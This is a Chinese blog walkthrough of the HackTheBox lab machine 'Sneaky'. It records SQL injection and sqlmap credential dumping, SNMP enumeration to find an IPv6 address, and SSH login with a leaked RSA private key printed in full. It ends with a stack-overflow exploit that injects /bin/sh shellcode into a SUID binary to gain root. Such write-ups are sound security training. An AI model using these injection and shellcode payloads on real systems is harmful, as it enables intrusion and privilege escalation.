文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox

VulnHub

代码审计

PHP代码审计

流量分析

机器学习

基础学习

Python

Python编程

Java

Java编程

算法

Leetcode

随笔

经验

技术

 2020-03-21   3.1k

不得不说这个靶机的质量非常高,值得一做。(假装安慰一下自己vip没有白充)

HTB::Sneaky Walkthrough

0x01 Info Card

0x02 Prior knowledge

IPv6

https://www.w3cschool.cn/ipv6/ipv6_address_types.html

http://www.what21.com/sys/view/net_ipv6_1536653956137.html

主要搞清楚IPv6的地址类型和格式,以及本机Mac地址转换成本地唯一地址的计算方法

SNMP

https://www.manageengine.com/network-monitoring/what-is-snmp.html

对于SNMP协议,主要是了解它的管理信息库(MIB,Management Information Base)和对象标识符(OID,Object ID)概念。管理信息库(MIB)是用于管理网络元素的信息的集合, 由对象标识符(OID)标识的管理对象组成了下面这种树状结构:

Buffer overflow

0x03 Tools and Tips

  • nmap
  • sqlmap
  • snmpwalk OR snmp-check
  • gdb
  • Basic SQL Injection
  • Enumerating SNMP
  • Basic buffer overflow exploitation

0x04 Pentesting

nmap扫描靶机端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
Nmap scan report for 10.10.10.20
Host is up (0.28s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Under Development!
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/19%OT=80%CT=1%CU=37304%PV=Y%DS=2%DC=T%G=Y%TM=5E72D70
OS:C%P=i686-pc-windows-windows)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=8
OS:)SEQ(CI=I%II=I)OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54B
OS:ST11NW7%O5=M54BST11NW7%O6=M54BST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W
OS:5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y
OS:%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%
OS:T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE
OS:(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops

TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 228.00 ms 10.10.16.1
2 296.00 ms 10.10.10.20

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 523.52 seconds

访问80端口的站点:

是一个静态页面,用dirsearch扫描一下站点目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
Target: http://10.10.10.20/

[22:26:48] Starting:
[22:26:55] 403 - 289B - /.ht_wsr.txt
[22:26:55] 403 - 282B - /.hta
[22:26:55] 403 - 293B - /.htaccess-local
[22:26:55] 403 - 293B - /.htaccess-marco
[22:26:55] 403 - 291B - /.htaccess-dev
[22:26:55] 403 - 291B - /.htaccess.BAK
[22:26:55] 403 - 292B - /.htaccess.bak1
[22:26:55] 403 - 291B - /.htaccess.old
[22:26:55] 403 - 294B - /.htaccess.sample
[22:26:55] 403 - 292B - /.htaccess.orig
[22:26:55] 403 - 291B - /.htaccess.txt
[22:26:55] 403 - 292B - /.htaccess.save
[22:26:55] 403 - 293B - /.htaccess_extra
[22:26:55] 403 - 292B - /.htaccess_orig
[22:26:55] 403 - 290B - /.htaccessBAK
[22:26:55] 403 - 290B - /.htaccess_sc
[22:26:55] 403 - 290B - /.htaccessOLD
[22:26:55] 403 - 288B - /.htaccess~
[22:26:55] 403 - 291B - /.htaccessOLD2
[22:26:55] 403 - 286B - /.htgroup
[22:26:55] 403 - 291B - /.htpasswd-old
[22:26:55] 403 - 292B - /.htpasswd_test
[22:26:55] 403 - 288B - /.htpasswds
[22:26:56] 403 - 286B - /.htusers
[22:28:10] 301 - 307B - /dev -> http://10.10.10.20/dev/
[22:28:10] 200 - 464B - /dev/
[22:28:30] 200 - 183B - /index.html
[22:29:14] 403 - 291B - /server-status
[22:29:14] 403 - 292B - /server-status/

Task Completed

发现了一个dev路径,是一个后台登录页面,用万能密码注入试一下:

成功登录:

有一个admin用户,还有一个SSH key,但是没有端口登录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAvQxBD5yRBGemrZI9F0O13j15wy9Ou8Z5Um2bC0lMdV9ckyU5
Lc4V+rY81lS4cWUx/EsnPrUyECJTtVXG1vayffJISugpon49LLqABZbyQzc4GgBr
3mi0MyfiGRh/Xr4L0+SwYdylkuX72E7rLkkigSt4s/zXp5dJmL2RBZDJf1Qh6Ugb
yDxG2ER49/wbdet8BKZ9EG7krGHgta4mfqrBbZiSBG1ST61VFC+G6v6GJQjC02cn
cb+zfPcTvcP0t63kdEreQbdASYK6/e7Iih/5eBy3i8YoNJd6Wr8/qVtmB+FuxcFj
oOqS9z0+G2keBfFlQzHttLr3mh70tgSA0fMKMwIDAQABAoIBAA23XOUYFAGAz7wa
Nyp/9CsaxMHfpdPD87uCTlSETfLaJ2pZsgtbv4aAQGvAm91GXVkTztYi6W34P6CR
h6rDHXI76PjeXV73z9J1+aHuMMelswFX9Huflyt7AlGV0G/8U/lcx1tiWfUNkLdC
CphCICnFEK3mc3Mqa+GUJ3iC58vAHAVUPIX/cUcblPDdOmxvazpnP4PW1rEpW8cT
OtsoA6quuPRn9O4vxDlaCdMYXfycNg6Uso0stD55tVTHcOz5MXIHh2rRKpl4817a
I0wXr9nY7hr+ZzrN0xy5beZRqEIdaDnQG6qBJFeAOi2d7RSnSU6qH08wOPQnsmcB
JkQxeUkCgYEA3RBR/0MJErfUb0+vJgBCwhfjd0x094mfmovecplIUoiP9Aqh77iz
5Kn4ABSCsfmiYf6kN8hhOzPAieARf5wbYhdjC0cxph7nI8P3Y6P9SrY3iFzQcpHY
ChzLrzkvV4wO+THz+QVLgmX3Yp1lmBYOSFwIirt/MmoSaASbqpwhPSUCgYEA2uym
+jZ9l84gdmLk7Z4LznJcvA54GBk6ESnPmUd8BArcYbla5jdSCNL4vfX3+ZaUsmgu
7Z9lLVVv1SjCdpfFM79SqyxzwmclXuwknC2iHtHKDW5aiUMTG3io23K58VDS0VwC
GR4wYcZF0iH/t4tn02qqOPaRGJAB3BD/B8bRxncCgYBI7hpvITl8EGOoOVyqJ8ne
aK0lbXblN2UNQnmnywP+HomHVH6qLIBEvwJPXHTlrFqzA6Q/tv7E3kT195MuS10J
VnfZf6pUiLtupDcYi0CEBmt5tE0cjxr78xYLf80rj8xcz+sSS3nm0ib0RMMAkr4x
hxNWWZcUFcRuxp5ogcvBdQKBgQDB/AYtGhGJbO1Y2WJOpseBY9aGEDAb8maAhNLd
1/iswE7tDMfdzFEVXpNoB0Z2UxZpS2WhyqZlWBoi/93oJa1on/QJlvbv4GO9y3LZ
LJpFwtDNu+XfUJ7irbS51tuqV1qmhmeZiCWIzZ5ahyPGqHEUZaR1mw2QfTIYpLrG
UkbZGwKBgGMjAQBfLX0tpRCPyDNaLebFEmw4yIhB78ElGv6U1oY5qRE04kjHm1k/
Hu+up36u92YlaT7Yk+fsk/k+IvCPum99pF3QR5SGIkZGIxczy7luxyxqDy3UfG31
rOgybvKIVYntsE6raXfnYsEcvfbaE0BsREpcOGYpsE+i7xCRqdLb
-----END RSA PRIVATE KEY-----

用BurpSuite把请求数据包保存成sneaky.req文件,再用sqlmap跑一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ sqlmap -r sneaky.req -p pass --dbms mysql --level 4 --risk 3 --dbs
...
[00:33:32] [INFO] fetching database names
available databases [4]:
[*] dev
[*] information_schema
[*] mysql
[*] performance_schema

$ sqlmap -r sneaky.req -p pass --dbms mysql --level 4 --risk 3 -D 'dev' --tables
...

$ sqlmap -r sneaky.req -p pass --dbms mysql --level 4 --risk 3 -D 'dev' -T 'users' --columns
...

$ sqlmap -r sneaky.req -p pass --dbms mysql --level 4 --risk 3 -D 'dev' -T 'users' -C 'name, pass' --dump
[00:38:48] [INFO] fetching entries of column(s) '`name`, pass' for table 'users' in database 'dev'
Database: dev
Table: users
[2 entries]
+--------------+----------------------+
| name | pass |
+--------------+----------------------+
| admin | sup3rstr0ngp4ssf0r4d |
| thrasivoulos | sup3rstr0ngp4ssf0r4d |
+--------------+----------------------+

扫出了两个用户,没啥思路了,看一下writeup提示,好吧,还要扫描UDP端口,161端口上运行snmp服务:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
PORT      STATE         SERVICE        VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: fcf2da02d0831859
| snmpEngineBoots: 8
|_ snmpEngineTime: 6h24m47s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 9.74 Kb sent, 9.74 Kb received
| eth0
| IP address: 10.10.10.20 Netmask: 255.255.255.0
| MAC address: 00:50:56:b9:37:ed (VMware)
| Type: ethernetCsmacd Speed: 4 Gbps
|_ Traffic stats: 7.92 Mb sent, 7.47 Mb received
| snmp-netstat:
| TCP 127.0.0.1:3306 0.0.0.0:0
|_ UDP 0.0.0.0:161 *:*

既然IPv4的防火墙没有开放22端口,换个思路看一下IPv6的端口开放情况,前提就是我们知道靶机的IPv6本地唯一地址(类似IPv6的内网/私网地址),这里就要利用SNMP服务。

使用snmpwalk工具扫描靶机上的设备:

1
snmpwalk -v2c -c public 10.10.10.20 > sneakly.snmp

打开文件之后直接全局搜索10.10.10.20

我们就能找到靶机的IPv6地址(十进制表示)

iso.3.6.1.2.1.4.34.1.4.2.16. 设备的OID号

转换成十六进制表示

1
dead:beef::0250:56ff:feb9:2771

当然,我一开始打开这个文件也是一脸懵逼的状态,完全不知道输出的是什么意思,我们可以适当的让snmpwalk输出的内容更加可读:

1
2
3
4
5
# 安装软件
sudo apt-get install snmp-mibs-downloader

# 编辑文件,注释掉mibs:这一行
vim /etc/snmp/snmp.conf

我们再执行snmpwalk命令,这一次可以再加一个OID参数减少输出的内容

1
2
3
4
$ snmpwalk -v2c -c public 10.10.10.20 1.3.6.1.2.1.4.34.1.4.2.16
IP-MIB::ipAddressType.ipv6."00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:01" = INTEGER: unicast(1)
IP-MIB::ipAddressType.ipv6."de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:27:71" = INTEGER: unicast(1)
IP-MIB::ipAddressType.ipv6."fe:80:00:00:00:00:00:00:02:50:56:ff:fe:b9:27:71" = INTEGER: unicast(1)

整理一下和刚刚得到的地址是一样的。

除此之外,还可以使用靶机作者写的一个Python脚本得到靶机的IPv6地址,传送门🚪

注意,要把/etc/snmp/snmp.conf文件改回来,不然会运行报错

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ nmap -sV -A -6 dead:beef::0250:56ff:feaa:0b69

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-30 22:11 IST
Nmap scan report for dead:beef::250:56ff:feaa:b69
Host is up (0.14s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 5d:5d:2a:97:85:a1:20:e2:26:e4:13:54:58:d6:a4:22 (DSA)
| 2048 a2:00:0e:99:0f:d3:ed:b0:19:d4:6b:a8:b1:93:d9:87 (RSA)
| 256 e3:29:c4:cb:87:98:df:99:6f:36:9f:31:50:e3:b9:42 (ECDSA)
|_ 256 e6:85:a8:f8:62:67:f7:01:28:a1:aa:00:b5:60:f2:21 (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 400 Bad Request
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| address-info:
| IPv6 EUI-64:
| MAC address:
| address: 00:50:56:aa:0b:69
|_ manuf: VMware

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.18 seconds

再用之前得到的SSH key登录靶机,拿到user.txt:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
λ ssh -6 -i sneaky.key [email protected]:beef::0250:56ff:feb9:2771
The authenticity of host 'dead:beef::250:56ff:feb9:2771 (dead:beef::250:56ff:feb9:2771)' can't be established.
ECDSA key fingerprint is SHA256:KCwXgk+ryPhJU+UhxyHAO16VCRFrty3aLPWPSkq/E2o.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'dead:beef::250:56ff:feb9:2771' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-75-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Fri Mar 20 08:31:46 EET 2020

System load: 0.0 Processes: 160
Usage of /: 9.9% of 18.58GB Users logged in: 0
Memory usage: 10% IP address for eth0: 10.10.10.20
Swap usage: 0%

Graph this data and manage this system at:
https://landscape.canonical.com/

Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Fri Mar 20 08:31:47 2020 from dead:beef:4::1057
[email protected]:~$ ls
user.txt

检查suid文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
[email protected]:~$ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null;
-rwsr-xr-x 1 root root 67704 Nov 24 2016 /bin/umount
-rwsr-xr-x 1 root root 35300 May 4 2017 /bin/su
-rwsr-xr-x 1 root root 88752 Nov 24 2016 /bin/mount
-rwsr-xr-x 1 root root 43316 May 8 2014 /bin/ping6
-rwsr-xr-x 1 root root 30112 May 15 2015 /bin/fusermount
-rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping
-rwsrwsr-x 1 root root 7301 May 4 2017 /usr/local/bin/chal
-rwsr-xr-- 1 root dip 323000 Apr 21 2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 18168 Nov 24 2015 /usr/bin/pkexec
-rwsr-xr-x 1 root root 18136 May 8 2014 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 35916 May 4 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 66284 May 4 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 45420 May 4 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
-rwsr-xr-x 1 root root 30984 May 4 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 156708 Oct 14 2016 /usr/bin/sudo
-rwsr-xr-x 1 root root 44620 May 4 2017 /usr/bin/chfn
-rwsr-xr-- 1 root messagebus 333952 Dec 7 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 492972 Aug 11 2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9808 Nov 24 2015 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 5480 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device

命令解释:

-perm -4000 列出拥有setuid属性的文件和目录

-user root 文件或目录所有者属于root

-exec ls -ld {} \ 对之前列出的文件目录再执行ls -ld命令

2>/dev/null 将标准错误输出stderr删掉

查看/usr/local/bin/chal文件

1
2
[email protected]:~$ file /usr/local/bin/chal
/usr/local/bin/chal: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=fc8ad06fcfafe1fbc2dbaa1a65222d685b047b11, not stripped

好了,从这里开始就到了我的知识盲区了,涉及到栈溢出漏洞的利用,只能跟着大佬一步一步的来。

Shellcode:http://shell-storm.org/shellcode/files/shellcode-811.php

1
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80
1
2
3
4
5
[email protected]:/usr/local/bin$ ./chal $(python -c 'print "\x90"*330 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x42\xf4\xff\xbf"*30')
# id
uid=1000(thrasivoulos) gid=1000(thrasivoulos) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(thrasivoulos)
# cat /root/root.txt
c515[----------------------------]fb33

0x05 Summary

Sneaky是一个2017年的靶机,评分5分,不得不说质量非常高。扫描常规的TCP端口和网站路径后,用基本的SQL注入拿到用户名和SSH key,但是现在遇到了没有开放22端口的问题,紧接着去扫描UDP端口,发现运行了SNMP服务,我们可以使用snmpwalk工具通过GETNEXT请求查询指定OID入口的所有OID树信息,由此获得了靶机了IPv6的地址,nmap扫描后发现开放了SSH 22端口。但是提权root用到了栈溢出的知识点,确实没什么基础,看起来有点吃力,先mark,下次有时间再研究一下。

0x06 Reference

https://www.youtube.com/watch?v=1UGxjqTnuyo&feature=youtu.be

https://s1gh.sh/hackthebox-sneaky-walkthrough/

https://hkh4cks.com/blog/2017/12/30/htb-sneaky-walkthrough/

https://www.hackingarticles.in/hack-the-box-challenge-sneaky-walkthrough/

Copyright © ca01h 2019-2020 | 本站总访问量